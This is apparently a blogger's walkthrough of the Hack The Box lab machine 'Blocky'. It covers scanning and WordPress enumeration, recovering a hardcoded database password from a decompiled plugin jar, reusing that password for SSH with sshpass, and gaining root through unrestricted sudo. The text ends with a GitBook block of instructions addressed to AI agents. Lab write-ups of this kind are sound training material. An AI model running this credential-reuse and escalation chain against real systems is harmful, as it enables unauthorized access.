# Blocky HTB Walkthrough

**Overview** :Open TCP ports: FTP (21), SSH (22) ,HTTP (80),minecraft(25565); Apache httpd 2.4.18;WordPress 4.8;Ubuntu 4ubuntu2.2 (Linux). **Add blocky on the /etc/hosts file**

**Recon** **port scan -nmap** ``` // nmap -T4 -A -p- 10.10.10.37 ```

Based on the OpenSSH and Apache versions, the host is likely running Ubuntu 16.04 Xenial. There’s also something interesting going on with TCP 25565, as it’s reporting closed. Apache link:; OpenSSH link: **Nikto Scan** ``` // nikto -host 10.10.10.37 ```

**Website - TCP 80** Visit web page 10.10.10.37:80

I find this web is WordPress as "proudly powered by WordPress" and it has wiki system as the server. I check this post and found the user account name notch and login page.

The default login admin:admin does not work. [**WepScan** ](/try-harder-journey/recon-enumeration.md) There are no plugins found. It does identify the notch user I noted earlier on the site. ``` ┌──(root💀kali)-[~/Desktop/htb/blocky] └─# wpscan --url http://10.10.10.37 -e ap,t,tt,u 130 ⨯ _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |) | (_ ___ __ _ _ __ ® \ \/ \/ / | ***/ *** \ / __|/ ` | ' \ \ /\ / | | _) | (| (| | | | | \/ \/ || |*****/ |,|| |*| WordPress Security Scanner by the WPScan Team Version 3.8.19 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N]y [i] Updating the Database ... [i] Update completed. [+] URL: http://10.10.10.37/ [10.10.10.37] [+] Started: Sun Nov 21 03:10:43 2021 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.18 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://10.10.10.37/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://10.10.10.37/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://10.10.10.37/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://10.10.10.37/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.8 identified (Insecure, released on 2017-06-08). | Found By: Rss Generator (Passive Detection) | - http://10.10.10.37/index.php/feed/, https://wordpress.org/?v=4.8 | - http://10.10.10.37/index.php/comments/feed/, https://wordpress.org/?v=4.8 [+] WordPress theme in use: twentyseventeen | Location: http://10.10.10.37/wp-content/themes/twentyseventeen/ | Last Updated: 2021-07-22T00:00:00.000Z | Readme: http://10.10.10.37/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 2.8 | Style URL: http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.3 (80% confidence) | Found By: Style (Passive Detection) | - http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3' [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Most Popular Themes (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:02:32 <============================================================================= =========> (400 / 400) 100.00% Time: 00:02:32 [+] Checking Theme Versions (via Passive and Aggressive Methods) [i] Theme(s) Identified: [+] twentyfifteen | Location: http://10.10.10.37/wp-content/themes/twentyfifteen/ | Last Updated: 2021-07-22T00:00:00.000Z | Readme: http://10.10.10.37/wp-content/themes/twentyfifteen/readme.txt | [!] The version is out of date, the latest version is 3.0 | Style URL: http://10.10.10.37/wp-content/themes/twentyfifteen/style.css | Style Name: Twenty Fifteen | Style URI: https://wordpress.org/themes/twentyfifteen/ | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Known Locations (Aggressive Detection) | - http://10.10.10.37/wp-content/themes/twentyfifteen/, status: 500 | | Version: 1.8 (80% confidence) | Found By: Style (Passive Detection) | - http://10.10.10.37/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 1.8' [+] twentyseventeen | Location: http://10.10.10.37/wp-content/themes/twentyseventeen/ | Last Updated: 2021-07-22T00:00:00.000Z | Readme: http://10.10.10.37/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 2.8 | Style URL: http://10.10.10.37/wp-content/themes/twentyseventeen/style.css | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Urls In Homepage (Passive Detection) | Confirmed By: Known Locations (Aggressive Detection) | - http://10.10.10.37/wp-content/themes/twentyseventeen/, status: 500 | | Version: 1.3 (80% confidence) | Found By: Style (Passive Detection) | - http://10.10.10.37/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 1.3' [+] twentysixteen | Location: http://10.10.10.37/wp-content/themes/twentysixteen/ | Last Updated: 2021-07-22T00:00:00.000Z | Readme: http://10.10.10.37/wp-content/themes/twentysixteen/readme.txt | [!] The version is out of date, the latest version is 2.5 | Style URL: http://10.10.10.37/wp-content/themes/twentysixteen/style.css | Style Name: Twenty Sixteen | Style URI: https://wordpress.org/themes/twentysixteen/ | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Known Locations (Aggressive Detection) | - http://10.10.10.37/wp-content/themes/twentysixteen/, status: 500 | | Version: 1.3 (80% confidence) | Found By: Style (Passive Detection) | - http://10.10.10.37/wp-content/themes/twentysixteen/style.css, Match: 'Version: 1.3' [+] Enumerating Timthumbs (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:04:42 <============================================================================= =======> (2575 / 2575) 100.00% Time: 00:04:42 [i] No Timthumbs Found. [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:01 <============================================================================= ===========> (10 / 10) 100.00% Time: 00:00:01 [i] User(s) Identified: [+] notch | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] Notch | Found By: Rss Generator (Passive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Sun Nov 21 03:18:20 2021 [+] Requests Done: 3050 [+] Cached Requests: 19 [+] Data Sent: 825.099 KB [+] Data Received: 18.245 MB [+] Memory used: 264.414 MB [+] Elapsed time: 00:07:37 ``` **Directory Brute Force (Run** [**Gobuster** ](/try-harder-journey/recon-enumeration.md#gobust)**and include PHP)** ``` ┌──(root💀kali)-[~/Desktop/htb/blocky] └─# gobuster dir -u blocky.htb -w /usr/share/wordlists/dirb/common.txt -x php -t 40 1 ⨯ =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://blocky.htb [+] Method: GET [+] Threads: 40 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: php [+] Timeout: 10s =============================================================== 2021/11/21 03:05:20 Starting gobuster in directory enumeration mode =============================================================== /.htaccess (Status: 403) [Size: 294] /.htaccess.php (Status: 403) [Size: 298] /.hta (Status: 403) [Size: 289] /.htpasswd (Status: 403) [Size: 294] /.htpasswd.php (Status: 403) [Size: 298] /.hta.php (Status: 403) [Size: 293] /index.php (Status: 301) [Size: 0] [--> http://blocky.htb/] /index.php (Status: 301) [Size: 0] [--> http://blocky.htb/] /javascript (Status: 301) [Size: 313] [--> http://blocky.htb/javascript/] /phpmyadmin (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/] /plugins (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/] /server-status (Status: 403) [Size: 298] /wiki (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/] /wp-content (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/] /wp-includes (Status: 301) [Size: 314] [--> http://blocky.htb/wp-includes/] /wp-login.php (Status: 200) [Size: 2402] /wp-admin (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/] /wp-blog-header.php (Status: 200) [Size: 0] /wp-config.php (Status: 200) [Size: 0] /wp-cron.php (Status: 200) [Size: 0] /wp-load.php (Status: 200) [Size: 0] /wp-links-opml.php (Status: 200) [Size: 219] /wp-trackback.php (Status: 200) [Size: 135] /wp-mail.php (Status: 403) [Size: 3444] /wp-settings.php (Status: 500) [Size: 0] /wp-signup.php (Status: 302) [Size: 0] [--> http://10.10.10.37/wp-login.php?action=register] /xmlrpc.php (Status: 405) [Size: 42] /xmlrpc.php (Status: 405) [Size: 42] =============================================================== 2021/11/21 03:06:30 Finished =============================================================== ``` From that list, I’ll check out /wiki, /plugins, and /phpmyadmin **visit 10.10.10.37:80/wiki**

**visit 10.10.10.37:80/phpmyadmin** I find default login admin:admin does not work.

**visit 10.10.10.37:80/plugins** I find two .jar files (BlockyCore.jar and griefprevention-1.11.2- 3.1.1.298.jar) and download in my host machine.

A JAR is a package file format typically used to aggregate many Java class files and associated metadata and resources into one file for distribution. JAR files are archive files that include a Java-specific manifest file. They are built on the ZIP format and typically have a .jar file extension. **Shell as notch** **Reverse Jars** I use JD-Gui to be decompile the java files.JD-GUI is a standalone graphical utility that displays Java source codes of “.class” files. You can browse the reconstructed source code with the JD-GUI for instant access to methods and fields. ***jd-gui:*** How to install: sudo apt install jd-gui, more details link : Install jd-gu

After installation, I launch the jd-gui with the command"jd-gui". Then I choose to check each jar file. I found the root login details in blockycore.class.

``` public class BlockyCore { ** public String sqlHost = "localhost";** ** public String sqlUser = "root";** ** public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";** ``` I try to login phpmyadmin account with root:8YsqfCTnvxAUeduzjNSXe22, and login successfully.

I check wp\_users and found the user notch information as followed. ``` SELECT * FROM `wp_users` ```

I choose "hash-identifier" to identify the possible hash "BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/". Hash-identifier is a software to identify the different types of hashes used to encrypt data and especially passwords.Find more information link: How to install: ``` apt install hash-identifier ``` I launch hash-identifier with the following command ``` hash-identifier ```

I know the hash is most likely to be an MD5 (WordPress) hash. **Exploitation(SSH -Port 22 )** I use SSH to login root or notch account. The SSH protocol (also referred to as Secure Shell) is a method for secure remote login from one computer to another. It provides several alternative options for strong authentication, and it protects the communications security and integrity with strong encryption. It is a secure alternative to the non-protected login protocols (such as telnet, rlogin) and insecure file transfer methods (such as FTP). More details : ; I find two user accounts (notch and root) and a password 8YsqfCTnvxAUeduzjNSXe22. I use ssh to login account notch with the command. ``` sshpass -p 8YsqfCTnvxAUeduzjNSXe22 ssh notch@10.10.10.37 or ssh notch@10.10.10.37 ``` **User Notch** I login notch with ssh but I get the error information "ssh: connect to host 10.10.10.37 port 22: No route to host". I google this error and find the resolve information link:

``` firewall-cmd --permanent --add-port=22/tcp firewall-cmd --reload OR sudo ufw allow 22/tcp sudo ufw reload ``` I choose to use ufw and then got another error information "zsh: command not found: ufw". I have to install the ufw tool and find the ufw installation information "apt install -y ufw". The details link is

**Login with tool SSHPASS** sshpass is a utility designed for running ssh using the mode referred to as “keyboard-interactive” password authentication, but in non-interactive mode. ssh uses direct TTY access to make sure that the password is indeed issued by an interactive keyboard user. Sshpass runs ssh in a dedicated tty, fooling it into thinking it is getting the password from an interactive user. More information link: ; how to install sshpass in kali: ``` apt-get install sshpass ```

**Privilege Escalation** **Notch --->Root** I use the command "sudo -l" and "sudo su -" to get root access. The root password is the same as notch. Sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for "superuser do" as the older versions of sudo were designed to run commands only as the superuser. More information link:

I can see that Notch has unlimited privileges and can run any command on the system.Then I root it with "sudo su -".

Thanks for reading . This is my 41th pwned machines in Hack the box. I will try harder to be beyond OSCP. Then I can pass OSCP successfully. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://atryharder.gitbook.io/try-harder-journey/htb/blocky-htb-walkthrough.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.